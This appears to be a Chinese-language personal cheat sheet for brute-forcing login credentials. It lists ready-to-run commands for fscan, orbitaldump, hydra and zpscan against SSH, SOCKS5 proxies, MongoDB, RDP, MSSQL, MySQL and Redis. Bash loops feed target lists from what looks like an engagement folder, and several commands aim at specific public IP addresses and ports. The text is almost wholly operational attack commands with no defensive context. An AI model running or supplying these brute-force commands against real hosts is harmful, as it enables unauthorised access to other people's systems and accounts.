爆破

目录

ssh

ssh密码

https://github.com/NewBee119/ssh-scanner.git

fscan

fscan是可以手动ssh爆破的,只是效果不太理想

./fscan -m ssh 

orbitaldump

pip install -U --user orbitaldump
python -m orbitaldump

python -m orbitaldump -t 10 -u usernames.txt -p passwords.txt -h example.com --proxies

hydra

hydra是爆破神奇,但是爆破ssh需要额外安装模块,有点麻烦。备用

socks5

hydra

./hydra -L ~/Documents/security/tools/zidian/username_deafult.txt -P ~/Documents/security/tools/zidian/Top50.txt socks5://116.162.51.88:8001

mongodb

zpscan

./zpscan_darwin crack -i "180.184.70.193:3717|mongodb"

批量脚本

while IFS= read -r line
do
 ./zpscan_darwin crack -i "${line}|mongodb"
done < "/Users/CONST27/Documents/project/honglan/9.25/mongodb.txt"

fscan

不如zpscan+bash脚本

RDP

zpscan

./zpscan_darwin crack -i "180.184.70.193:3389|rdp"

批量脚本

while IFS= read -r line
do
 ./zpscan_darwin crack -i "${line}|rdp"
done < "/Users/CONST27/Documents/project/honglan/9.25/rdp.txt"

mssql

zpscan

./zpscan_darwin crack -i "180.184.70.193:1433|mssql"
while IFS= read -r line
do
 ./zpscan_darwin crack -i "${line}|mssql"
done < "/Users/CONST27/Documents/project/honglan/9.25/mssql_url.txt"

mysql

zpscan

Redis

zpscan

密码生成

https://github.com/sry309/PwdBUD.git